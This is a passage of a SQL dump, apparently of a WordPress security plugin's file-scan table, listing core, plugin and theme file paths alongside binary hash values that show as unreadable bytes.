R�!ӵ�','',0,'?'),('�i���B�j����]','wp-includes/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G8�J+��	��z','>8���\'X�i�Ub�Gн�,<T`6��4Ѝ�','',0,'?'),('����v���ό�Y9�','wp-includes/ID3/getid3.lib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CPb$M6̟��ҁ�','\"\Z^�,8>K����@��湅����l��|AF��','',0,'?'),('���X����H�o�v�','wp-admin/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�����A��d3w\\&','�\0\r���dli3�m.��~u����7=	���l','',0,'?'),('��!N��D�w�`��[�','wp-includes/js/jquery/ui/dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�屬�U��u���z̜','H7�pn�\Z��8����__E<��\r��','',0,'?'),('��U�]>�rք�{��v','wp-content/plugins/wp-cerber/assets/flags/cf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��oG��`?���','�\0�m�٢K��K��ǡNЙT���	��','',0,'?'),('���Xp����~0D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�oe�~��oB2�_;','5�q��SrL�]�OX����sq����+l<��ɒ','',0,'?'),('��֗]NR���S{qv?�','wp-admin/css/wp-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*i����[p]��<','r5S�E�?29/�)��_�PJv�Vh���R�','',0,'?'),('��\Z,z���Ґ�U�','wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*���n���fTq�x','�pܞ�H�|�W���kס�|ZO<.�~`r^�}pL','',0,'?'),('��O܎$8��J�e��','wp-content/plugins/wordfence/models/scanner/wfScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X�)�f��.�T�','3�/x\"��W���h@���fP\0]������','',0,'?'),('��*v�<�TC�U�XJn','wp-includes/blocks/column/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%YO�<c���y�z','��U�\r3f0�¦w����y�v��POW�{�!','',0,'?'),('�����n�E��','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-site-lockout-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nOΨ�J���z�<','ԥ6Wi��� F4�hd��4��ˡV8�\0ݟ�','',0,'?'),('�V�܂0\0U�`�5C>','wp-includes/css/dist/components/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-����w�w���Ok','�bql�Vpph��)�S2\r�����Y~���','',0,'?'),('�\Z� �R����[�\'�>','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('�$�����j�X�])D:','wp-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ZZ���o���T','�^ƕ�/���&���){\'��:&[[�B�Q5�N�','',0,'?'),('�2�\\�17Հ�wi�{','wp-includes/js/dist/vendor/wp-polyfill.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8@\r�k��9�Ϫ�R5X','����J��f�w�m-�M�.�(�3�@�!��','',0,'?'),('�H�)������jH�j','wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�\'B�l�If���\"c','��O$��U?��\nR��y���V�=�T���Z','',0,'?'),('�Nsf�#�@Q;�;�{̻','wp-includes/blocks/query-pagination-numbers/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��de���:�!$��','y\"�Ϛ����z~IH�)�0�B�c�C��W��X','',0,'?'),('�c��O��-��+oe','wp-includes/blocks/block/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�Z�q�3)���','0&#��b�93LC\0����vX��<cɘ�TX','',0,'?'),('�j%M�ɍ��p)Z��','wp-admin/images/generic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'�[#98!�','�{u���K[g͆Ex�{�:߼��lͨG��','',0,'?'),('�x���D��hd{jdpx','wp-content/plugins/redirection/locale/redirection-pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�\Z��ڌE�3d�>!','���n�\Z_�/��.�wܻ���f�j�hcN}','',0,'?'),('��RKQ�5v�-��	��','wp-includes/css/dist/edit-post/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�œX1^11j�j�^','�S\ZX�}��\nM�S�\Z��d��5Hr�dߖ�','',0,'?'),('��q��뻣D(���j��','wp-includes/blocks/list/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���g��\\a�7`&','O#��D$^���m�ӕ��9�޺��y�H�j','',0,'?'),('��;(Xp`ҙ��pݷ','wp-includes/js/plupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���CN<+�<t�','1��u �e)�β?��L���U2�7A)��Z�','',0,'?'),('��t�0�g�a�/��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��-����x\'�	','��{ڋ��N�o��#X�+Xe\'�����_����>\Z','',0,'?'),('�\n�qo�qZVyX��9','wp-admin/includes/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#&��9��hE�p��6�','Ǫ�s��E\'���\\l��D)i�$�����q','',0,'?'),('�)q�\"��ff�\nlߩ|','wp-content/plugins/wp-cerber/admin/cerber-admin-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hᶴ���l�a�lc�','�7h[X}�����܆)L�=���o�����','',0,'?'),('�`�@�����YE�!','wp-includes/Requests/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w%Z�*�H���','�~����c�yh�G�K��S��huP�����m�(','',0,'?'),('��Ư	\'CԻ��ګ\Z','wp-includes/images/admin-bar-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���:�W���^','��rN!�`VO�c��K��viՀ{Fn\Z��le','',0,'?'),('��4��#հ�}��','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�j-�W�.�{��@','�i%X�Y`FmZ���E^ab}r�_E�����3�','',0,'?'),('��\"�Z0\0ؿe�Ԧp�','wp-admin/css/admin-menu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_���Q7�5m1��','a�}���S{K�~�2��,��P�={����','',0,'?'),('����\"8Y��74�O<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','di�BD�J���D�5�O','N�a���i�B���\r��AO]���@�P��','',0,'?'),('����x8[!>�X','wp-admin/includes/class-wp-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"?DС���H���','�{)�y\\���M�ԇ;��Hw���r���6','',0,'?'),('����o*nFߘ7��','wp-content/plugins/wp-cerber/assets/flags/mv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'���FꠈT�[�~��','�dE4{��P�-��B������:�Þ$�{FF�','',0,'?'),('��ue�{X�1���','wp-includes/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�5��$ý\n	�\'q0','\\��\"�ԯ-\r6��e�N�ID�zB�\r\0��','',0,'?'),('�/��0)���\Z�','wp-content/plugins/wordfence/views/scanner/issue-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S��>���Z����G�','���\n��#Pw3Id��}͇%�J���j�U��+','',0,'?'),('�1�cUd���/R�	','wp-content/plugins/wp-cerber/assets/flags/nu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׭Y�C�����=7Ѝ�','���z��f���7?v�F�`)c�۱���s`$+','',0,'?'),('�@�q��G�-$����|�','wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����gPʋ��i��[','�DeJ�\Z�fxb�	x\'P�:�����U','',0,'?'),('�S���KK2iɈ','wp-includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�ҩL�ȕ�<C��7	','h1����ޛ�}�B�\Zf���F�Ұ�I�','',0,'?'),('�f�g-�6A�[�X�~�','wp-content/plugins/redirection/locale/json/redirection-sv_SE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�7�����jW�','��	�!���pL�0�!���Yu��3���WW','',0,'?'),('�x�_,[��5����','wp-content/plugins/wordfence/images/sort_asc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ǐ#a]2������','����[8l�Y���ckl��	��u#KV���n','',0,'?'),('�y�g��zaU\"�	XKG','wp-includes/js/hoverIntent.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�BU��4�X$ 6�i�','#�����0�4%�6ad�Z@!\",��6\r��','',0,'?'),('���X��k�\nX�l<{M�','wp-content/plugins/redirection/redirection-front.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','en@�l;��yi��','�u��|�]�6iYC}`6�#�<¡S�Q�F','',0,'?'),('���NTZt�o\r�%��F','wp-content/plugins/wordfence/views/scanner/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tL�Ga�\0�oҠbY','2�6��l�n\r��\"� c�:�ƅz�v�J1ܶ��','',0,'?'),('����������wT','wp-includes/blocks/button/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�鿾>T9��*�L�','��/�=ٜ�����}j��.9��lg�','',0,'?'),('�/�ɘ�]�^�W\\�q','wp-includes/css/wp-embed-template.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')I+�w2�h���K\"�','�6&�}�ok��AM\Z> �|�F�6,e�t\rPq','',0,'?'),('�v{L�Jlō�Yz�`�(','wp-includes/js/thickbox/thickbox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��P�R�n�,(�f�','M�ߍ��V�_�^����ol\'\0��qYL�̘)���','',0,'?'),('��k��V��G�d�/��','wp-content/plugins/wp-cerber/assets/flags/th.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�Vtc��3�G�G�','��o�#�ߗ|!\\A�L=Uހ��L��q�Y�p','',0,'?'),('��(��NL�;	��','wp-includes/js/dist/api-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�|��bM�h�H�}d','��\Z���r}��Z8���~n��z�5����:��','',0,'?'),('���퇴���u��4�6','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�fk��<��\r\n��','R!�O]p�I\n��\\��VP�9�=��!�?���','',0,'?'),('��\r�m�s\0�@�=[�','wp-includes/blocks/text-columns/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F���Y�e `g���T',']�aE��\n0�X�B��Tl}X�k\"O˟���','',0,'?'),('��֬+I�7���^��','wp-includes/blocks/file/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c\Zi���:�׼vs��','���Q\rpoN�˃WCn�L�YG��=����*','',0,'?'),('�����A���V�f��','wp-content/plugins/wp-cerber/assets/flags/ug.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����h�UNJ}�','��;�T�W��m��	����(Izҁ��h2','',0,'?'),('�X�VטO|8}���','wp-includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"Z���y_x��','�ˋ��E}\\2���j�QP1�É�\'1���C�G&','',0,'?'),('�.�XvQa�*C��eN','wp-content/plugins/wp-cerber/assets/flags/ph.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','06zD\'�w��� �','����?�ͺ�mV�yi�z2	�BC�	m�jX��','',0,'?'),('�B�H*mz��N83��','wp-admin/css/edit-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�nV*)oQ�$F��ő','g���7�OD�{�9d�v̓�]��','',0,'?'),('�V}�P���m�/�|I*�','wp-includes/js/customize-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�6��!��҃z��','�G?~�D�,(�F]�I�bNE��pc�v:���z','',0,'?'),('�l��t:{0+7�9C�','wp-includes/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Hx+�07��`�}�','@qz�j�I���� \0D�a�W��6n�{���y�','',0,'?'),('��.��v8-rJŕ�qQ','wp-includes/js/wp-auth-check.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2���YT�x�w�','E�ID(10i�|�V:��^�s\ZXǂ\\�9k�O�G','',0,'?'),('��6��U�Ѧ�u�','wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3n9L�P����u��d��','��c�C8\0ы#\"����#�T��\rXas{A�','',0,'?'),('��7��E#�wŧj���','wp-admin/includes/image-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�a�uN��r�E�','�ῦ�$�2��׎�\'s��R��\\^}|�#hi�7d�','',0,'?'),('����bq�/���F�k','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7��¤\r�F��g','�n�V\'�V����V�)F|*ᑝ2�N��z','',0,'?'),('��v��|�-��','wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�<�]��r�','���p[�����L7F��|˖ZB�R�','',0,'?'),('�!HUN&�\"����z��','wp-admin/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0Z?eq����D�x�1','�l���^p0̝X\'tGM[��\Z\r�JQ�\rh','',0,'?'),('�7}eK�8q%�Z��','wp-content/themes/newsmagbd/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��j/��v�K�D',']�w�T���6+�����<��ť�#�b','',0,'?'),('�F߇���#��ata�','wp-includes/block-patterns/query-small-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj*�R�F�;Q�<�','���n��/�L�^�w�n����CN��~�*��	','',0,'?'),('�L��~iS?�v�C>�@y','wp-includes/blocks/latest-comments/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���R}K�V��=�u�','�JaSG4���gL���j.�Ϋ�L#DX�,s�','',0,'?'),('�S7��zǫ�W�~�2�','wp-includes/blocks/site-tagline/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',=��SPE��ҧ��','ʈ�	�ؿߥ��~��E��k��,f����f�R','',0,'?'),('�a�tU�q�^!�0ƣl�','wp-includes/post-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�%�J|,%Fś@','��6�x��q�#�\n��[j��E��9�9e�^Q','',0,'?'),('�k���zߣ����bo�R','wp-admin/post-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I\n(��ḑ���{z','�T�Ѷ�����Lc���4�O���oFd���d','',0,'?'),('�vO��#�J�N��+쁁','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('�|v�P��0�fh�T�','wp-includes/js/dist/block-directory.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z���N�3^',')sp��&7c�/�fw\r���9���','',0,'?'),('��@��{�J��5䷴X','wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U,�:)��؋\"�QqY','\"�Oo�ۈ���<��oES-MO÷�YN�!��','',0,'?'),('��w�h��M�M0��^�','wp-content/plugins/redirection/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F*d��~Ȫ,�CX�','�x�Zy�\Z$�e�D)�n�9�U}�k�,�\'�\Zy','',0,'?'),('����V�h��G�!�j\'','wp-content/plugins/wp-cerber/assets/flags/jm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b��F/�+�d9','\n�Ƽ�H�_���T�T�2�[�_��ox�u�','',0,'?'),('����L��6	��׳','wp-includes/ID3/module.audio.ac3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Y����\Zk0�aM','�b��^#��¨(t�^�rߘz���9�F���','',0,'?'),('��T��V���\\��','wp-admin/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�֒��y�DБ�#�','L��)Ӊ�\"�.4l��N�U�7�+#��R}���','',0,'?'),('���Nt�K�U��','wp-includes/Requests/Exception/HTTP/407.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qx+�D.42\0����','>\Z���]ƚ�B̏Xv�ذc����.N2�NҹЯ','',0,'?'),('�ܵ[Ҳm%�6�S8:D','wp-includes/images/toggle-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��·�a��;�d��*�','[b\Z���;�]�f�0���s|:�����%','',0,'?'),('��!ެ��߳���p','wp-includes/images/crystal/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�>)*/��!�-�','���n$���_�u	�$Q3��E�׏r�|Jm�','',0,'?'),('���I	2�R�NjY��','wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�\rs*�\\�','��O�Z=�<�3S�t�Q����_�u;�	m8','',0,'?'),('�&�M�X��W��O�','wp-includes/error-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?5�p��.9�;F�ܧ�','֦ �7S�\Z�\\��cdLb|o�1��Y�ã��:','',0,'?'),('�J�=��\'�<A�ml�','wp-content/themes/newsmagbd/inc/tgm/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%$�J���\\�','��&�qW�`�T����l�V �Y۞g��AF','',0,'?'),('�S�򽟈b�eL��','wp-content/plugins/wp-cerber/assets/flags/be.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YZx��ʭ��T�/� �','4�nMM��e)񤉓��<�Ia�P�1�K�~#`G','',0,'?'),('�\\Д��h��c��','wp-includes/blocks/page-list/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A��i�y��\rS��&g�','����`��j�]�q�\\ј��9�~t?�E���','',0,'?'),('�h�����FuQe� �','wp-includes/images/wlw/wp-comments.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6]P����.s���','�zl\Z��C��D���#�a�N��3\'XZ�','',0,'?'),('�u1HM:E7/�{�','wp-admin/includes/class-wp-site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�>��ȯX)�','(��TӠC�ϲ�ێ��ܾﯖ����g�','',0,'?'),('��ZԬ=!Ri=�7�h�','wp-includes/js/dist/vendor/wp-polyfill-object-fit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w$�1)x5)L��{p','�Ljv��㡴y\"0�Mp�@���R�Tඒ�K�','',0,'?'),('��H����|��5���H','wp-content/plugins/redirection/locale/json/redirection-el.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r���C�,�Fۊ+','n,�+i\Z�2��&c6BnOӵ�pFo�N2�x�|}','',0,'?'),('��N*yVy�Q�Qj§,C','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Light.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Gd1ȓX*_j%\r��','�I�XS��>;]^�q�3��\"`���d�5�9��','',0,'?'),('�ǀ3�<��&��YĆ','wp-includes/class-wp-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?T�v���|U�y','?}]�����b4\0����J�� ��5�.��1U','',0,'?'),('��f0��ͭ��~�)','wp-includes/fonts/dashicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�_rY+ʂ;�','��yU�]f��8���t�����l�L.','',0,'?'),('��.�IOI�P��%�)','wp-includes/Requests/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M������/����','ɯO3e���F��㛆��v+����.r/�>�,','',0,'?'),('��MO,���s���\r��','wp-includes/class-wp-http-encoding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Usg2eޫj9�EA����','t��1��XZ��C�9��c��x](D[9��O�','',0,'?'),('��+�c;����55�','wp-content/plugins/redirection/database/database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s*��J�Jֆ�[o���','�A��,�v21�	 3hZ\n�6~�$՛b�N','',0,'?'),('��z��J/�B&C�%','wp-includes/blocks/post-featured-image/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�f�|�����&','!/hj���YqO��k<w��i^pǫ�5\\ȈVJ�(\n','',0,'?'),('�#ynہ彐[hr\\�U','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@����{�Թ6','�دh\Z�o�>���:즱�l� 5D�_�\'-�w','',0,'?'),('�,>!�:e���[\"','wp-content/plugins/redirection/models/log/log-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��{t��|,Y�su(','B�V�OOP�#?�i���v�8�V�e\\{�-���','',0,'?'),('�5��;T��]��\0�”','wp-includes/blocks/post-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����OQ���R��','s��2㼶�@��u�C\'��<z��|�c��V','',0,'?'),('�6�|;�;8�Q�4�k��','wp-admin/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�^|1��ޭ�a��9 ','@��,�����o�G�ARԊe�\n�\Z���1�=','',0,'?'),('�9�e�E��bݾl�3�','wp-includes/js/wp-lists.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p�Z�\ZF�\\�~¥','d��vWV��<rڍN�3z*޶�����7��','',0,'?'),('�W��f�0�\n�D	�/\'','wp-content/plugins/wp-cerber/assets/flags/km.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%������&\'z���V',';��NS6����:����݇�u͙�r�x� ','',0,'?'),('�s�6Z��$Ӿy��D(','wp-includes/blocks/group/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=>���*��f��[���','ϩ���z��J&�O{|K�^�֤�0.�1t','',0,'?'),('�z9�	�`�d3�\0�Iay','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �@��^����8J','��ؽ�@��B-K���m���-Ȼ��\Z�2p','',0,'?'),('���*r%Y�3/�hN�p','wp-content/plugins/wp-cerber/assets/flags/sb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�5J��䈒?Qo�<','����T�	k��w#�����Af�3A2�͂M','',0,'?'),('��\Z5o��#R\'/��l','wp-includes/fonts/dashicons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N\Z>w���@�R-/Y�','B\nZ\Z��_p�n͂��Q?/�\r3s�}���)','',0,'?'),('���{�RDC�~�����','wp-content/plugins/redirection/redirection.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{Y|��c������','���o�;�Q�#�*�S��{Í�\09�6�ǽ','',0,'?'),('����E�?��Юᾠ','wp-includes/js/media-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ٰkK��\\���R','�hXf���3t��RS<;��f&6]2쒗���+�','',0,'?'),('� �v����bu)','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�r����]��/�','yus���Կ�����:�\0)�y�zs�ݿSkH�','',0,'?'),('���R:^�e+x2��c','wp-includes/PHPMailer/SMTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӂ�\'�;R����<?','\n:P�(\ZAU�ٵ�< ���pe\0��W��o/b�','',0,'?'),('��Cg����}|�E��','wp-admin/js/word-count.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)�\r�]�X0�h5�\n�','�\\DE����lV�����Hk��\\N�A3���','',0,'?'),('�	v�O.�|ߤҵ�','wp-includes/js/tinymce/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�����x:�`����','Y��#wO�g^\'�b��:�^�	=跨|��','',0,'?'),('�C�Q%��@	�Ja �','wp-includes/blocks/archives/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�՜VH����Zf��','4!\0�}!�;9o�l�_�l�4��f��L��V�l','',0,'?'),('�Lߨ�Ϥ�(��R�','wp-admin/css/code-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gq���i�s�픋-','�~:\"�`�he&@��*����A�����','',0,'?'),('�k�|DD��*@4�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nAgv��1P�ص','����0o*\r��vA�o�3���:��j�u���y','',0,'?'),('��p��K�b��\0!�(��','wp-includes/css/dist/block-directory/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�諸��ؠc�l�','��R\r��<B��w<u��\r$$��Ÿa@c�T','',0,'?'),('��hxh�M*����S�','wp-content/plugins/wp-cerber/assets/flags/bn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C.M��sg:��','s�@�Zd}���x���-r���^�x8Z.���','',0,'?'),('��|�~�������','wp-includes/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('��b�������|e~�','wp-admin/css/customize-widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���T��{�:4%��','k���V>��,�@f\r,t�~�	����`^','',0,'?'),('���al�V�?�f�\Zё�','wp-includes/IXR/class-IXR-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d߹��$c�9�','\0�{M��U�\rN.�)���-����`wH���','',0,'?'),('�\0h�Kf��\0�','wp-content/plugins/wordfence/images/forward_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0/3e4e�����','0��Q7018�ު9-�z9ؽq��SrĒ�P��','',0,'?'),('����Ž��H�06�','wp-admin/images/browser.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ž�K\\�b�$�F','&$�ĉ9����~_SH�_�̓�%L���\'&�','',0,'?'),('����8(\Z�j�Z]}','wp-includes/js/jquery/ui/effect-pulsate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\0�q2�l����d','ȩ~��0M���0\"���7	]1�sP�J�T','',0,'?'),('�U�S�\rB��c>\r�','wp-includes/blocks/latest-comments/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��O7\\� (�I�q','�o�H88!��x�U���D!��W$~۝k�I�','',0,'?'),('�X�R�ev�� O��U','wp-includes/blocks/quote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ei�61���t$LW','���@�u�t\Z��G@�G������H3)����g','',0,'?'),('�X����g5��(�=c','wp-includes/js/tinymce/skins/lightgray/img/trans.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7I �1F�Gu�j^','�� �û���ͥJ��O�mO�:ϙ���l�W�5','',0,'?'),('�pt_ 